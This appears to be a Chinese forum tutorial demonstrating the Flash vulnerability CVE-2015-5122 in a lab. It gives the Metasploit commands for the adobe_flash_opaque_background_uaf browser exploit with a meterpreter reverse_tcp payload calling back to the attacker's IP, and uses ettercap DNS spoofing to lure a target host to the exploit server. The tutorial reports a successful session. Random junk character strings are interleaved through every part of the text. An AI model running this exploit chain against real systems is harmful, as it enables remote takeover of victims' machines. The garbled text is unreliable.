4 p n( B2 H+ j2 u. S 二、cve2015-5122漏洞实例演示虚拟机 / o* g" J/ W1 @
% p: V5 T% w+ M; A1 Z
" l4 O, y% `9 G* C8 g" O8 P
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
h1 \" P3 Q& k. I' Y4 Q' r
* j! Y* V% U/ y1 r
2 z3 `4 \. f& ?/ q& e% E search cve-2015-5122如图: * l3 t( ?& x. [' ?4 w
D# e/ T9 B9 l9 Y! p
% g! I( D; x4 k* ?, Y ) e- ?! ?/ K. Z$ B( E
' O4 F: c ~( u; d
5 |, A: L& F( v# o! v: ~ 下面我们敲如下命令:
' s' ^4 T$ W9 u: G7 C ! o: ?6 x! \( U5 d2 ` D
3 Q$ S' y: R) {5 v4 t% a use exploit/multi/browser/adobe_flash_opaque_background_uaf % x6 Z5 j! C3 J
) M8 x7 A. Q: O3 _' o$ W7 A' l8 @; l8 l& u( R) D
set PAYLOAD windows/meterpreter/reverse_tcp
. L9 w$ y0 |' f9 E3 a ) z- W/ F6 V3 l5 w) }
# B0 U6 t. P" F, f set LHOST 192.168.0.109
0 L x% w8 m* a- j6 J# i ! u: p- g- }, z( Q
/ l3 J% \- x1 r& L$ r set URIPATH / /*根目录*/
& ?( f0 y3 [& X $ y" U! |% ^5 L: d5 K0 d8 T
( h( P+ k! }0 M& h' V, ?7 H3 U
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
1 Y! `7 ]/ E0 z8 s h) K
) l) y/ p( J0 d6 f# }- H% u! p8 M: s2 M* ^3 ^
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
7 e- M* m+ r# Z! V* c/ t ) e4 o! y/ ^5 |( o( K( b! ~
; P# @$ ]: G; C$ k: F# [# c
然后show options如图:
& F! U, [7 s# A `) _- O: N+ x
: N# }0 U v. f* }# v+ y$ {$ n. S+ D5 M- n
7 }( d" R: Z' c! g- _8 }8 ^
4 u2 d" o- ~1 ]' ?& p
, v3 ~5 W" M' I V 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: 4 N3 |/ G; }2 y7 s6 H M+ A
* k; |3 E& {/ {$ ]2 ~
; L- x4 p) I2 C2 s: E
( M$ \- H) a0 t& o% c( n 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 $ U# L% k$ `4 q! u( X' v; R
2 E2 @0 p2 F: R' T
1 e% w/ A0 a/ e Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
# S; M# P& [2 W! G; L8 \
2 c, u3 r) q7 b) p' C: b: `# W2 ]9 F; K
. Q0 ^3 N3 [' E) G; v1 r. E
0 b! Q/ |9 [* @! P9 S- t" }- h5 v T
成功了,这时候我们断开ettercap,如图:
5 k1 W+ A1 E1 q
/ @4 a3 t6 L9 H0 N H
: i# E& D. Z7 j) t0 R% D
5 @/ P+ e& M* j2 Y, c+ T! k* Z' h $ |0 L- O2 Z0 u
7 d0 f7 P/ H- | Screenshot如图: V+ ^0 f8 Q4 v+ E, M
" v+ _, B9 N+ v# W5 L# c2 c
& Y5 T' o6 M0 W/ C. J+ p }2 s- {! ~
- G8 _' o: F2 y* X! U
6 M( h3 F8 {+ D# T3 K
( X2 K4 z5 @: y; a 9 z) P! |( O, i5 l6 N
|